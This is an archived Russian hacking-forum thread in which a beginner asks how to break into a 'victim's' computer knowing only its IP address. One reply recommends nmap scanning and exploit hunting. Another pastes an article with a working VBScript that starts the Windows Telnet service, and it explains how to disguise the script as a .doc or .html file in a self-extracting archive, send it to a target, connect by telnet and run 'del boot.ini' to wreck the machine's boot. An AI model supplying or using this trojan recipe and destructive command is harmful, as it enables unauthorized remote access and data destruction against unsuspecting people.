Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Как проникнуть в комп к жертве?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Как проникнуть в комп к жертве?
Имя
Сообщение << Старые топики   Новые топики >>
Как проникнуть в комп к жертве? - 2008-08-20 14:37:20.623333   
Mirk

Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
многие и я в том числи начинающие хотят узнать как ломануть комп. кто может как можно подробнее описать этот процес? и так известен IP Адрес жертвы, что дальше? какие проги надо и что делать. плиз обьясните…
Post #: 1
RE: Как проникнуть в комп к жертве? - 2008-08-20 14:37:52.886666   
хPurg3n

Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
1) Юзай поиск по форуму.
2) Юзай нмап скань комп ищи порты открытые. смотри какие сервисы висят на этих портах, ищи под них сплоиты.
3) Юзай гугл, если чтото непонятно из первых двух пунктов.
Post #: 2
RE: Как проникнуть в комп к жертве? - 2008-08-20 14:54:03.440000   
Mirk

Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
хехе, железный ответ:)))
Post #: 3
RE: Как проникнуть в комп к жертве? - 2008-08-20 14:56:53.083333   
Mirk

Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
дайте название сканеров
Post #: 4
RE: Как проникнуть в комп к жертве? - 2008-08-20 15:02:50.913333   
хPurg3n

Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
Nmap, XSpider
Post #: 5
RE: Как проникнуть в комп к жертве? - 2008-08-20 17:08:06.650000   
amega

Сообщений: 40
Оценки: 0
Присоединился: 2008-04-30 22:11:25.380000
Вот тока не помню где я взял ету статю но ее стоит почитать


Так, для начала определимся, что нам будет нужно, и
постараемся обойтись минимальным набором. Если ты в курсе, в
WinXP существует служба с названием TlntSvr. Как ты думаешь,
что это за фишка?
Раскрою огромнейший сверхсуперсекрет: это служба Телнета! Что
такое Телнет и как им пользоваться, можно узнать, если зайти
в Центр справки и поддержки, который встроен у тебя в систему
(при условии, что ты поклонник дяди Билли и у тебя не Пингвин)
Или сделать Пуск - Выполнить - cmd.exe, в чёрном окошке вбить
telnet /? и читать, читать и читать!
После того как ты запомнишь основные команды телнета
(может, ты уже их знаешь? Тогда супер!), можно идти дальше.

Думаешь, зачем я всё это тебе рассказываю? А затем,
что этот самый телнет может очень нам помочь в деле удалённого
управления Ну и что с того, что эта служба по умолчанию
отключена? А мы возьмём и включим её. К сожалению, абсолютно
удалённо это сделать довольно нелегко, поэтому нам необходимо
нечто, запускающее эту службу.

III. Таблетки не помогут…

…потому что наш трой - это НЕ вредоносная программа
как таковая. В ней вообще нет ни строчки вредоносного кода! Это
обычная команда запуска системной службы. Вот только возможные
последствия могут быть крайне опасными
Смотря как воспользоваться этим методом…

Итак, нам необходимы следующие инструменты:
- текстовый редактор (подойдёт Блокнот)
- знание синтаксиса команд Telnet
- знание основных принципов организации операционной системы
WinXP, прикладных программ
- знание основных принципов построения и функционирования
локальных сетей и Интернет

Для начала этого хватит. Теперь открываем Блокнот и
вбиваем туда следующее:

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
&amp; "{impersonationLevel=impersonate}!\\" _
&amp; strComputer &amp; "\root\cimv2")
Set colServiceList = objWMIService.ExecQuery _
("Select * from Win32_Service where Name='TlntSvr'")
For Each objService in colServiceList
errReturn = objService.StartService()
Next

Обо всём по порядку. Первая строка отвечает за то,
чтобы скрипт запустился на том компе, где его открыли.
Остальные варианты предназначены для контроллера домена AD
и не существенны в данной ситуации.
Вторая строка - это обращение к WMI - Windows
Management Instrumentation, или к Набору Инструментария
управления Виндовсом Очень нужная штука, кстати, и сейчас
мы это докажем
Третья строка нас отправляет с вопросом к WMI, типа,
а где тут у нас службы находятся? ))
На что WMI отвечает, что все службы тута, выбирай любую. Вот
мы и выбираем службу TlntSvr.
Теперь осталось запустить выбранную службу:
objService.StartService()

IV.

Зачем мы всё это делали? Затем, что теперь на той
машине, где сработал этот скрипт, есть очень интересный порт 23,
на котором висит не менее интересная служба ТЕЛНЕТ! Если,
конечно, ты понимаешь, к чему это я.

Собственно, теперь можно сохранить этот код из Блокнота
с расширением *.vbs, засунуть в самораспаковывающийся архив (если
не знаешь, что это такое - юзай справку WinRAR) и смело засылать
недругу с иконкой *.doc или *.html файла. После чего Пуск -
Выполнить - cmd.exe, там вбиваем telnet 123.45.67.89 и привет,
мы в корне диска удалённой машины. А дальше уже твоя фантазия )))

Самая оригинальная команда в этом случае - del boot.ini.

И пусть потом перезагрузится…

Удачи!


Post #: 6
Страниц:  [1]
Все форумы >> [Для начинающих] >> Как проникнуть в комп к жертве?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.